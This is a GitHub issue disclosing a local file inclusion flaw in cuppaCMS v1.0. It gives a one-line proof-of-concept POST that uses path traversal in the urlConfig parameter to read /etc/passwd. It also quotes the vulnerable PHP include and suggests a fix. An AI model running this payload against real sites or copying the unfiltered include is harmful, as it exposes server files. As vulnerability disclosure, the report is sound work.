Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Unauthorized local file inclusion (LFI) vulnerability exists via the urlConfig parameter in /alerts/alertConfigField.php #25

Open
bkfish opened this issue Feb 16, 2022 · 1 comment

Comments

@bkfish
Copy link

bkfish commented Feb 16, 2022

Product version:cuppaCMS v1.0 http://cuppacms.com/files/cuppa_cms.zip

poc

POST /alerts/alertConfigField.php
urlConfig=../../../../../../../../../../../../../../etc/passwd

image

analysis

location: /alerts/alertConfigField.php line 77
image
<?php include "../components/table_manager/fields/config/".@$cuppa->POST("urlConfig"); ?>
and $cuppa->POST

       // post
    public function POST($string){
                return $this->sanitizeString(@$_POST[$string]);
       }

go on

      public function sanitizeString($string){
                return htmlspecialchars(trim(@$string));
            }

so the post urlConfig without any lfi protected filter

Repair suggestions

you can check urlConfig ,for example check if it has .. then refuse this request

@hansmach1ne
Copy link

Check #15. This is a duplicate

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

2 participants